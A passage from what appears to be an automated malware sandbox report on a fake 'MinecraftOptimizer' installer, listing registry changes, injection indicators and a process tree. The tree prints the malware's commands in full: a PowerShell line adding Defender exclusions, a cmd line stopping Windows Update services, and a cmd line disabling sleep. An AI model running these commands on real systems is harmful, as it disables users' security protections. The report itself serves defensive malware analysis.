3138613661616137000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000073796d726b63637500000000000000008408e6667430f343a65b22750d85fde62c6c3e04d450ef11a2a4f2ce673d64898408e6667430f343a65b22750d85fde62c6c3e04d450ef11a2a4f2ce673d6489ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003100370030003600330037003700390037002d003500360038003300390033003300320030002d0033003200330032003900330033003000330035002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000f7b83aff000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f7c9fdb7-40e6-491b- = 19adea31b2f8da01	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\56630366-c91c-4475-	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\28060ad3-a9d4-4eb1-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\044fc247-6503-4e48-	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cba29585-924a-410e-	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f80cb859f6720028040b29b5540cc05aab60000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	Explorer.EXE
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2170637797-568393320-3232933035-1000\{E8D28024-EA56-4E1B-9E01-81A0D99793A5}	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a0c1440a-41d5-497f- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\28060ad3-a9d4-4eb1- = "0"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3fe1172f-3fc8-496f- = "0"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4f790d38-c427-43c2- = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\65754edb-3b73-442b- = 3fbacb31b2f8da01	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4f790d38-c427-43c2-	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "2"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\NavBar = 000000000000000000000000000000008b000000870000003153505305d5cdd59c2e1b10939708002b2cf9ae6b0000005a000000007b00360044003800420042003300440033002d0039004400380037002d0034004100390031002d0041004200350036002d003400460033003000430046004600450046004500390046007d005f0057006900640074006800000013000000cc0000000000000000000000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings	MinecraftOptimizer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\03108a3e-b4c1-4d9c- = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4f790d38-c427-43c2- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

Explorer.EXE

pid process

3380 Explorer.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msiexec.exeMinecraftOptimizer‮raj.scrpowershell.exedialer.exepowershell.exe

pid	process
1264	msiexec.exe
1264	msiexec.exe
2700	MinecraftOptimizer‮raj.scr
2700	MinecraftOptimizer‮raj.scr
5820	powershell.exe
5820	powershell.exe
5820	powershell.exe
2700	MinecraftOptimizer‮raj.scr
2700	MinecraftOptimizer‮raj.scr
2700	MinecraftOptimizer‮raj.scr
2700	MinecraftOptimizer‮raj.scr
2700	MinecraftOptimizer‮raj.scr
2700	MinecraftOptimizer‮raj.scr
2700	MinecraftOptimizer‮raj.scr
2700	MinecraftOptimizer‮raj.scr
2288	dialer.exe
2288	dialer.exe
5392	powershell.exe
5392	powershell.exe
2288	dialer.exe
2288	dialer.exe
2288	dialer.exe
2288	dialer.exe
5392	powershell.exe
2288	dialer.exe
2288	dialer.exe
2288	dialer.exe
2288	dialer.exe
5392	powershell.exe
2288	dialer.exe
2288	dialer.exe
2288	dialer.exe
2288	dialer.exe
2288	dialer.exe
2288	dialer.exe
2288	dialer.exe
2288	dialer.exe
2288	dialer.exe
2288	dialer.exe
2288	dialer.exe
5392	powershell.exe
2288	dialer.exe
2288	dialer.exe
2288	dialer.exe
2288	dialer.exe
2700	MinecraftOptimizer‮raj.scr
2700	MinecraftOptimizer‮raj.scr
2288	dialer.exe
2288	dialer.exe
2288	dialer.exe
2288	dialer.exe
2288	dialer.exe
2288	dialer.exe
2288	dialer.exe
2288	dialer.exe
2288	dialer.exe
2288	dialer.exe
2288	dialer.exe
2288	dialer.exe
2288	dialer.exe
2288	dialer.exe
2288	dialer.exe
2288	dialer.exe
2288	dialer.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

OpenWith.exeExplorer.EXE

pid process

3376 OpenWith.exe
3380 Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

msiexec.exemsiexec.exemsiexec.exevssvc.exe

description	pid	process
Token: SeShutdownPrivilege	2080	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2080	msiexec.exe
Token: SeSecurityPrivilege	1264	msiexec.exe
Token: SeShutdownPrivilege	4956	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4956	msiexec.exe
Token: SeCreateTokenPrivilege	2080	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2080	msiexec.exe
Token: SeLockMemoryPrivilege	2080	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2080	msiexec.exe
Token: SeMachineAccountPrivilege	2080	msiexec.exe
Token: SeTcbPrivilege	2080	msiexec.exe
Token: SeSecurityPrivilege	2080	msiexec.exe
Token: SeTakeOwnershipPrivilege	2080	msiexec.exe
Token: SeLoadDriverPrivilege	2080	msiexec.exe
Token: SeSystemProfilePrivilege	2080	msiexec.exe
Token: SeSystemtimePrivilege	2080	msiexec.exe
Token: SeProfSingleProcessPrivilege	2080	msiexec.exe
Token: SeIncBasePriorityPrivilege	2080	msiexec.exe
Token: SeCreatePagefilePrivilege	2080	msiexec.exe
Token: SeCreatePermanentPrivilege	2080	msiexec.exe
Token: SeBackupPrivilege	2080	msiexec.exe
Token: SeRestorePrivilege	2080	msiexec.exe
Token: SeShutdownPrivilege	2080	msiexec.exe
Token: SeDebugPrivilege	2080	msiexec.exe
Token: SeAuditPrivilege	2080	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2080	msiexec.exe
Token: SeChangeNotifyPrivilege	2080	msiexec.exe
Token: SeRemoteShutdownPrivilege	2080	msiexec.exe
Token: SeUndockPrivilege	2080	msiexec.exe
Token: SeSyncAgentPrivilege	2080	msiexec.exe
Token: SeEnableDelegationPrivilege	2080	msiexec.exe
Token: SeManageVolumePrivilege	2080	msiexec.exe
Token: SeImpersonatePrivilege	2080	msiexec.exe
Token: SeCreateGlobalPrivilege	2080	msiexec.exe
Token: SeCreateTokenPrivilege	4956	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	4956	msiexec.exe
Token: SeLockMemoryPrivilege	4956	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4956	msiexec.exe
Token: SeMachineAccountPrivilege	4956	msiexec.exe
Token: SeTcbPrivilege	4956	msiexec.exe
Token: SeSecurityPrivilege	4956	msiexec.exe
Token: SeTakeOwnershipPrivilege	4956	msiexec.exe
Token: SeLoadDriverPrivilege	4956	msiexec.exe
Token: SeSystemProfilePrivilege	4956	msiexec.exe
Token: SeSystemtimePrivilege	4956	msiexec.exe
Token: SeProfSingleProcessPrivilege	4956	msiexec.exe
Token: SeIncBasePriorityPrivilege	4956	msiexec.exe
Token: SeCreatePagefilePrivilege	4956	msiexec.exe
Token: SeCreatePermanentPrivilege	4956	msiexec.exe
Token: SeBackupPrivilege	4956	msiexec.exe
Token: SeRestorePrivilege	4956	msiexec.exe
Token: SeShutdownPrivilege	4956	msiexec.exe
Token: SeDebugPrivilege	4956	msiexec.exe
Token: SeAuditPrivilege	4956	msiexec.exe
Token: SeSystemEnvironmentPrivilege	4956	msiexec.exe
Token: SeChangeNotifyPrivilege	4956	msiexec.exe
Token: SeRemoteShutdownPrivilege	4956	msiexec.exe
Token: SeUndockPrivilege	4956	msiexec.exe
Token: SeSyncAgentPrivilege	4956	msiexec.exe
Token: SeEnableDelegationPrivilege	4956	msiexec.exe
Token: SeManageVolumePrivilege	4956	msiexec.exe
Token: SeImpersonatePrivilege	4956	msiexec.exe
Token: SeCreateGlobalPrivilege	4956	msiexec.exe
Token: SeBackupPrivilege	3360	vssvc.exe

Suspicious use of FindShellTrayWindow 24 IoCs

Processes:

msiexec.exemsiexec.exeExplorer.EXEApplicationFrameHost.exemsiexec.exe

pid	process
2080	msiexec.exe
4956	msiexec.exe
2080	msiexec.exe
2080	msiexec.exe
2080	msiexec.exe
4956	msiexec.exe
4956	msiexec.exe
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
2380	ApplicationFrameHost.exe
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
6724	msiexec.exe
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
6724	msiexec.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

Explorer.EXE

pid	process
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE

Suspicious use of SetWindowsHookEx 19 IoCs

Processes:

OpenWith.exeConhost.exeExplorer.EXESystemSettings.exeConhost.exeOpenWith.exeConhost.exe

pid	process
3376	OpenWith.exe
5416	Conhost.exe
3380	Explorer.EXE
4588	SystemSettings.exe
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE
3060	Conhost.exe
5244	OpenWith.exe
3380	Explorer.EXE
6356	Conhost.exe
3380	Explorer.EXE
3380	Explorer.EXE
3380	Explorer.EXE

Suspicious use of UnmapMainImage 4 IoCs

Processes:

RuntimeBroker.exesvchost.exeRuntimeBroker.exe

pid process

1996 RuntimeBroker.exe
2440 svchost.exe
3980 RuntimeBroker.exe
1996 RuntimeBroker.exe

pid	process
1996	RuntimeBroker.exe
2440	svchost.exe
3980	RuntimeBroker.exe
1996	RuntimeBroker.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msiexec.exeMsiExec.exeMinecraftOptimizer.execmd.exeMinecraftOptimizer‮raj.scrcmd.exedialer.exe

description	pid	process	target process
PID 1264 wrote to memory of 5424	1264	msiexec.exe	srtasks.exe
PID 1264 wrote to memory of 5424	1264	msiexec.exe	srtasks.exe
PID 1264 wrote to memory of 5508	1264	msiexec.exe	MsiExec.exe
PID 1264 wrote to memory of 5508	1264	msiexec.exe	MsiExec.exe
PID 1264 wrote to memory of 5508	1264	msiexec.exe	MsiExec.exe
PID 5508 wrote to memory of 5772	5508	MsiExec.exe	ICACLS.EXE
PID 5508 wrote to memory of 5772	5508	MsiExec.exe	ICACLS.EXE
PID 5508 wrote to memory of 5772	5508	MsiExec.exe	ICACLS.EXE
PID 5508 wrote to memory of 5832	5508	MsiExec.exe	EXPAND.EXE
PID 5508 wrote to memory of 5832	5508	MsiExec.exe	EXPAND.EXE
PID 5508 wrote to memory of 5832	5508	MsiExec.exe	EXPAND.EXE
PID 5508 wrote to memory of 5904	5508	MsiExec.exe	MinecraftOptimizer.exe
PID 5508 wrote to memory of 5904	5508	MsiExec.exe	MinecraftOptimizer.exe
PID 5904 wrote to memory of 6012	5904	MinecraftOptimizer.exe	javaw.exe
PID 5904 wrote to memory of 6012	5904	MinecraftOptimizer.exe	javaw.exe
PID 5904 wrote to memory of 2700	5904	MinecraftOptimizer.exe	MinecraftOptimizer‮raj.scr
PID 5904 wrote to memory of 2700	5904	MinecraftOptimizer.exe	MinecraftOptimizer‮raj.scr
PID 5936 wrote to memory of 5984	5936	cmd.exe	sc.exe
PID 5936 wrote to memory of 5984	5936	cmd.exe	sc.exe
PID 5936 wrote to memory of 6028	5936	cmd.exe	sc.exe
PID 5936 wrote to memory of 6028	5936	cmd.exe	sc.exe
PID 5936 wrote to memory of 6060	5936	cmd.exe	sc.exe
PID 5936 wrote to memory of 6060	5936	cmd.exe	sc.exe
PID 5936 wrote to memory of 6084	5936	cmd.exe	sc.exe
PID 5936 wrote to memory of 6084	5936	cmd.exe	sc.exe
PID 5936 wrote to memory of 6112	5936	cmd.exe	sc.exe
PID 5936 wrote to memory of 6112	5936	cmd.exe	sc.exe
PID 2700 wrote to memory of 2288	2700	MinecraftOptimizer‮raj.scr	dialer.exe
PID 1448 wrote to memory of 2156	1448	cmd.exe	powercfg.exe
PID 1448 wrote to memory of 2156	1448	cmd.exe	powercfg.exe
PID 1448 wrote to memory of 5044	1448	cmd.exe	powercfg.exe
PID 1448 wrote to memory of 5044	1448	cmd.exe	powercfg.exe
PID 2288 wrote to memory of 624	2288	dialer.exe	winlogon.exe
PID 2288 wrote to memory of 680	2288	dialer.exe	lsass.exe
PID 2288 wrote to memory of 960	2288	dialer.exe	svchost.exe
PID 2288 wrote to memory of 384	2288	dialer.exe	dwm.exe
PID 2288 wrote to memory of 1044	2288	dialer.exe	svchost.exe
PID 2288 wrote to memory of 1064	2288	dialer.exe	svchost.exe
PID 2288 wrote to memory of 1072	2288	dialer.exe	svchost.exe
PID 2288 wrote to memory of 1176	2288	dialer.exe	svchost.exe
PID 2288 wrote to memory of 1208	2288	dialer.exe	svchost.exe
PID 2288 wrote to memory of 1316	2288	dialer.exe	svchost.exe
PID 2288 wrote to memory of 1336	2288	dialer.exe	svchost.exe
PID 2288 wrote to memory of 1352	2288	dialer.exe	svchost.exe
PID 2288 wrote to memory of 1452	2288	dialer.exe	svchost.exe
PID 2288 wrote to memory of 1484	2288	dialer.exe	svchost.exe
PID 2288 wrote to memory of 1492	2288	dialer.exe	svchost.exe
PID 2288 wrote to memory of 1528	2288	dialer.exe	svchost.exe
PID 2288 wrote to memory of 1636	2288	dialer.exe	svchost.exe
PID 2288 wrote to memory of 1700	2288	dialer.exe	svchost.exe
PID 2288 wrote to memory of 1720	2288	dialer.exe	svchost.exe
PID 2288 wrote to memory of 1816	2288	dialer.exe	svchost.exe
PID 2288 wrote to memory of 1844	2288	dialer.exe	svchost.exe
PID 2288 wrote to memory of 1928	2288	dialer.exe	svchost.exe
PID 2288 wrote to memory of 1936	2288	dialer.exe	svchost.exe
PID 2288 wrote to memory of 1988	2288	dialer.exe	svchost.exe
PID 2288 wrote to memory of 2016	2288	dialer.exe	svchost.exe
PID 2288 wrote to memory of 1728	2288	dialer.exe	spoolsv.exe
PID 2288 wrote to memory of 2136	2288	dialer.exe	svchost.exe
PID 2288 wrote to memory of 2220	2288	dialer.exe	svchost.exe
PID 2288 wrote to memory of 2304	2288	dialer.exe	svchost.exe
PID 2288 wrote to memory of 2384	2288	dialer.exe	svchost.exe
PID 2288 wrote to memory of 2424	2288	dialer.exe	svchost.exe
PID 2288 wrote to memory of 2440	2288	dialer.exe	svchost.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:624

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
PID:384

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:960

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1044

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1064

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1072

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1176

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2⤵
PID:2456

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5012

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3308

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1208

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1316

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1336

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1352

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1452

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1484

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1492

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1528

C:\Windows\system32\sihost.exe
sihost.exe
2⤵
PID:3004

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefaulte9475423h04e3h40e9h8f62hab75423e692c
3⤵
PID:5200

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1636

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1700

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1720

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1816

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1844

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1928

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1936

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1988

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2016

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1728

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2136

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2220

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2304

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2384

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2424

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Suspicious use of UnmapMainImage
PID:2440

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2492

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2508

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2520

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2536

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2928

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:3048

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3140

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3292

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3380

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\.html
2⤵
PID:2244

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5820

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
2⤵
- Suspicious use of WriteProcessMemory
PID:5936

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:5984

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:6028

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:6060

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:6084

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:6112

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Power Settings
- Suspicious use of WriteProcessMemory
PID:1448

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:5188

C:\Windows\System32\powercfg.exe
